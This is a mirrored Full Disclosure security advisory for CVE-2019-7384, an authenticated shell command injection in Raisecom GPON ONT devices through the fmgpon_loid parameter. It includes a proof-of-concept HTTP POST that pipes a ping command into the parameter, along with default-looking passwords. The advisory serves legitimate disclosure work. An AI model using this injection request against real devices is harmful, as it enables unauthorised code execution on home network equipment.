Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

KSA-Dev-005:CVE-2019-7384: Authenticated Remote Code Execution in Raisecom GPON Devices

Related Vulnerabilities: CVE-2019-7384  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="32"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#33">By Date</a>
<a href="34"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="32"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#33">By Thread</a>
<a href="34"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">KSA-Dev-005:CVE-2019-7384: Authenticated Remote Code Execution in Raisecom GPON Devices</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Kingkaustubh via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Tue, 12 Feb 2019 14:41:51 +0530


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384.
Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

 ISCOM HT803G-U
 ISCOM HT803G-W
 ISCOM HT803G-1GE
 ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-005


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services 
including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the 
Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and 
convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play 
service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, 
such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 
802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series 
can be managed under the Raisecom NView platform.


Description: 
============

 An authenticated shell command injection issue has been discovered in  Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, 
and HT803G GPON products with the firmware version
 ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call
 inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the 
device.

Additional_information
======================

The value of fmgpon_loid parameter is parse to system call in implimentation of application code inside boa binary and 
since their is no user input validation this leads to authenticated code execution on device


Vulnerability Class:
====================
Authenticated Shell Command Injection

Attack Type
===========
 Local


Impact Code execution
=====================
 true

Attack Vectors
==============
 To exploit this vulnerability one must have to visit the crafted page or have to parse the proper crafted request to 
the device



How to Reproduce: (POC):
========================

POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <a rel="nofollow" href="http://192.168.1.1/gpon.asp">http://192.168.1.1/gpon.asp</a>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&amp;fmgpon_loid_password=raisecom&amp;fmgpon_ploam_password=1234567890&amp;apply=Apply+Changes&amp;submit-url=%2Fgpon.asp

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure: 
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor 
10-Dec-2018 Recived confirmation from vendor regarding fix
04-JAN-2019 Request for the CVE-ID
04-FEB-2018: CVE assigned 

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh () me com
* <a rel="nofollow" href="https://s3curityb3ast.github.io/">https://s3curityb3ast.github.io/</a>
* <a rel="nofollow" href="https://twitter.com/s3curityb3ast">https://twitter.com/s3curityb3ast</a>
* <a rel="nofollow" href="http://breakthesec.com">http://breakthesec.com</a>
* <a rel="nofollow" href="https://www.linkedin.com/in/kaustubhpadwad">https://www.linkedin.com/in/kaustubhpadwad</a>



_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="32"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#33">By Date</a>
<a href="34"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="32"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#33">By Thread</a>
<a href="34"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>KSA-Dev-005:CVE-2019-7384: Authenticated Remote Code Execution in Raisecom GPON Devices</strong> <em>Kingkaustubh via Fulldisclosure (Feb 12)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started